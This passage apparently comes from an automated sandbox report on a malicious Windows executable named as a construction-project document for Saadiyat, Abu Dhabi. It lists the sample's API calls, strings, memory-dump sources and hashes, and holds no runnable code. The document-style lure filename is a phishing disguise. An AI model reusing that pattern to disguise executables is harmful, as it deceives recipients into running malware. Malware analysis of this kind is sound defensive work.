                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406283
                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406297
                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004062AA
                                                                                                                          Strings
                                                                                                                          • *?|<>/":, xrefs: 00406272
                                                                                                                          • "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe", xrefs: 00406264
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406221, 00406226
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-328738330
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                                          • GetSysColor.USER32(?), ref: 00404265
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                            • Part of subcall function 00403062: SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                            • Part of subcall function 00403062: WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 64603807-0
                                                                                                                          • Opcode ID: 0d0ac1bbfc16594790c3092933b554426185fd63630a1a508f3210ce7ca09ae8
                                                                                                                          • Instruction ID: 8d03524e730972d0d2727a111309b29fb4c1dd807b4b6f2d90347fc94b995f65
                                                                                                                          • Opcode Fuzzy Hash: 0d0ac1bbfc16594790c3092933b554426185fd63630a1a508f3210ce7ca09ae8
                                                                                                                          • Instruction Fuzzy Hash: A5215C72C00118BFDF11AFA4CE89CAE7E79EF08364B14463AF514762E0C6795E419BA9
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(000600C7,?,0005F700), ref: 00402D13
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                          • Opcode ID: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                                                                                          • Instruction ID: 78f52ac4307216ae4daf114a653e214d9194ffd889c5bb91718f5c3abb157098
                                                                                                                          • Opcode Fuzzy Hash: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                                                                                          • Instruction Fuzzy Hash: D1015E31909220EBC7616B64EE5DBDA3AA8AF00704B14457BF905B11F5C6B85C45CFAE
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                                                                                          • GetMessagePos.USER32 ref: 00404B21
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                          • Instruction ID: 7d165c7f7153624e3963f679d066e3c154625e4b871d361bb7407d5cf98d8b00
                                                                                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                          • Instruction Fuzzy Hash: 97014C71D00219BADB00DB94DD85FFEBBBCAB59711F10412ABB10B71D0D7B4A9018BA5
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                          • Opcode ID: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                                          • Instruction ID: 1a6e545745197b7d5f0e024d91f0b7ce6738c211f373f8126abe8c19e9ad5020
                                                                                                                          • Opcode Fuzzy Hash: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                                          • Instruction Fuzzy Hash: A6F03670504108BBEF205F50DD4ABEE3768FB00309F00843AFA16B51D1DBB95959DF59
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                          • wsprintfW.USER32 ref: 00404A9A
                                                                                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s$&B
                                                                                                                          • API String ID: 3540041739-2907463167
                                                                                                                          • Opcode ID: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                                                                                          • Instruction ID: ab388700b69d78aa859054a1700c1a1d69e67ce61d201efd873ebc4ad7f6fd90
                                                                                                                          • Opcode Fuzzy Hash: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                                                                                          • Instruction Fuzzy Hash: 4F11D8736441282BDB00656D9C45E9F328DDB85334F154237FA25F71D1EA78CC2286E9
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                           • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                           • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2979337801-0
                                                                                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                           • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                           • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1148316912-0
                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                                          • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3808545654-0
                                                                                                                          • Opcode ID: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                                                                                          • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                                                                                          • Opcode Fuzzy Hash: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                                                                                          • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EA4
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EC7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                          • Instruction ID: 99b29286c29c4417609fc152e7ab7d49c37a34cf298751ff58d773eaaaf64e16
                                                                                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                          • Instruction Fuzzy Hash: 0501483215020AEADB218F16ED08E9B3BA8EF44351F00443AF944D2220E335DA60CBE5
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405A90
                                                                                                                          • CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                          • CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsbA563.tmp, xrefs: 00405A83
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
